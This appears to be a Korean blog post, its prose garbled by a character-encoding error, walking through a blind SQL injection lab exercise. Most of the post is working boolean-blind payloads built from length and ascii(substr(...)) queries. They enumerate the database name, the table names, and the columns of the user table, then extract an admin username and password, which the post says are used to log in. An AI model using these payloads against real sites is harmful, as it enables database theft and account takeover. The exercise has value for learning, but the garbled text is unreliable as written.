์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

SQL Injection ์‹ค์Šต


1. ์—๋Ÿฌ ๋ฐ ์ทจ์•ฝ์  ์ง„๋‹จ

board_id์— ' ์ถ”๊ฐ€ ํ›„ Forward ํ•˜๊ธฐ
์—๋Ÿฌ๋ฌธ์ด ๋œจ์ง€๋งŒ ํ•ด๋‹น ์—๋Ÿฌ๋ฌธ์€ DB์—๋Ÿฌ๊ฐ€ ์•„๋‹Œ ์„œ๋ฒ„ ์—๋Ÿฌ๋ฌธ


Enter idx 3-1 and Forward.
Confirmed that the arithmetic does not take effect (the page does not respond as it does for idx 2).


blind ๋ฐฉ์‹์œผ๋กœ ๊ณต๊ฒฉ ๊ฐ€๋Šฅ ํ™•์ธ 
์ฐธ์ผ๋•Œ ๊ฒฐ๊ณผ๊ฐ’๊ณผ ๊ฑฐ์ง“์ผ๋•Œ ๊ฒฐ๊ณผ๊ฐ’
Contents based ๊ณต๊ฒฉ ๊ฐ€๋Šฅ

# ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ ๊ธ€์ž ์ˆ˜ 7๊ธ€์ž
length((SELECT database()))=7

# ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ ๊ธ€์ž ์ฒซ ๊ธ€์ž๊ฐ€ 'a' ์ธ๊ฐ€์š”?
substr((SELECT database()))='a'
# ' < ๊ธฐํ˜ธ๋ฅผ ์“ธ ์ˆ˜ ์—†์„ ๋•Œ ์•„์Šคํ‚ค์ฝ”๋“œ ๋ถ€๋“ฑํ˜ธ๋กœ ์‚ฌ์šฉ
ascii(substr((SELECT database()),1,1))>80
ascii(substr((SELECT database()),1,1))=112
ascii(substr((SELECT database()),2,1))=101
ascii(substr((SELECT database()),3,1))=110
ascii(substr((SELECT database()),4,1))=116
ascii(substr((SELECT database()),5,1))=101
ascii(substr((SELECT database()),6,1))=115
ascii(substr((SELECT database()),7,1))=116

ํ…Œ์ด๋ธ” ๊ฐฏ์ˆ˜ ์ถ”์ถœ

2 matches๋กœ ์ฐธ ํ™•์ธ

# pentest ํ…Œ์ด๋ธ” ๊ฐฏ์ˆ˜๊ฐ€ 5๊ฐœ ์ธ๊ฐ€์š” ?
(SELECT count(*) FROM information_schema.tables WHERE table_schema=0x70656E74657374)=5

์ฒซ๋ฒˆ์งธ ํ…Œ์ด๋ธ” ๊ธ€์ž ์ˆ˜ ์ถ”์ถœ

# ์ฒซ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ 5๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1))=5
# ๋‘๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ n๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 1,1))=n
# ์„ธ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ 6๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1))=6
# ๋„ค๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ n๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 3,1))=n
# ๋‹ค์„ฏ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ 4๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1))=4

# pentest์˜ ์ฒซ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์ด๋ฆ„์˜ ์ฒซ ๊ธ€์ž๊ฐ€ 98์ธ๊ฐ€์š” ?
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),1,1))=98
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),3,1))=97
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),4,1))=114
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),5,1))=100

# 3 > 6๊ธ€์ž notice
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),1,1))=110
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),3,1))=116
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),4,1))=105
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),5,1))=99
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),6,1))=101
# 4 > n๊ธ€์ž
# 5 > 4๊ธ€์ž user
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),1,1))=117
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),2,1))=115
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),3,1))=101
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),4,1))=114

ํ…Œ์ด๋ธ” ์นผ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ์นผ๋Ÿผ์˜ ๊ธ€์ž ์ˆ˜๋Š”?

# pentest ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ user ํ…Œ์ด๋ธ”์˜ ์ฒซ๋ฒˆ์งธ ์นผ๋Ÿผ์˜ ์ด๋ฆ„์€ 2๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 0,1))=2
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 1,1))=6
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 2,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 3,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 4,1))=4
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 5,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 6,1))=5
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 7,1))=7
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 8,1))=5


์ฒซ๋ฒˆ์งธ ์นผ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ๊ธ€์ž

# pentest์— user์— ์žˆ๋Š” ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ : ID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),1,1))=73
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),2,1))=68
# pentest์— user์— ์žˆ๋Š” ๋‘๋ฒˆ์งธ ์ปฌ๋Ÿผ : userID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+1,1),1,1))=117
117 115 101 114 73 68 > userID
# pentest์— user์— ์žˆ๋Š” ์„ธ๋ฒˆ์งธ ์ปฌ๋Ÿผ : password
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+2,1),1,1))=112
112 97 115 115 119 111 114 100 > password
# pentest์— user์— userID์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ๊ธ€์ž์ˆ˜๋Š” 5๊ธ€์ž
length((SELECT userID FROM pentest.user LIMIT 0,1))=5

# pentest์— user์— userID์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ์ฒซ ๊ธ€์ž = 97
ascii(substr((SELECT userID FROM pentest.user LIMIT 0,1),1,1))=97
# 97 100 109 105 110 > admin

# pentest์— user์— password์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ๊ธ€์ž์ˆ˜๋Š” 11๊ธ€์ž
length((SELECT password FROM pentest.user LIMIT 0,1))=11
# 97 100 109 105 110 > admin

# pentest์— user์— password์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ์ฒซ ๊ธ€์ž = 49
ascii(substr((SELECT password FROM pentest.user LIMIT 0,1),1,1))=49
# 49 113 50 119 51 101 52 114 53 116 33 > 1q2w3e4r5t!

์•Œ๊ฒŒ๋œ ID์™€ ๋น„๋ฐ€๋ฒˆํ˜ธ๋กœ ๋กœ๊ทธ์ธ
